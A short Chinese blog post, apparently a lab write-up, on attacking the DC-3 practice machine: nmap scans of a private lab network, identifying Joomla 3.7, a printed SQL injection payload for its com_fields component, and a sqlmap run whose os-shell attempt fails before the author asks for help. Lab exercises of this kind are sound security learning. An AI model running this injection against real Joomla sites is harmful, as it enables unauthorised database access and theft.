DC-3靶机学习

筅森魡賤 提交于 2020-10-18 12:48:30

1.日常扫描

nmap -sP -PI 192.168.2.0/24 -T4


是134这个地址

nmap -A -p- 192.168.2.134

2.joomla

1)版本扫描


joomla 3.7这个版本有个sql注入漏洞
poc

/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml(0x23,concat(1,user()),1)

2)漏洞确认

上sqlmap

探测到是dba,试试os-shell
不行,害
跑了下,注射到字段,出不来字段名,有点蒙逼
来个好人救救可怜的博主吧,害




标签
易学教程内所有资源均来自网络或用户发布的内容,如有违反法律规定的内容欢迎反馈
该文章没有解决你所遇到的问题?点击提问,说说你的问题,让更多的人一起探讨吧!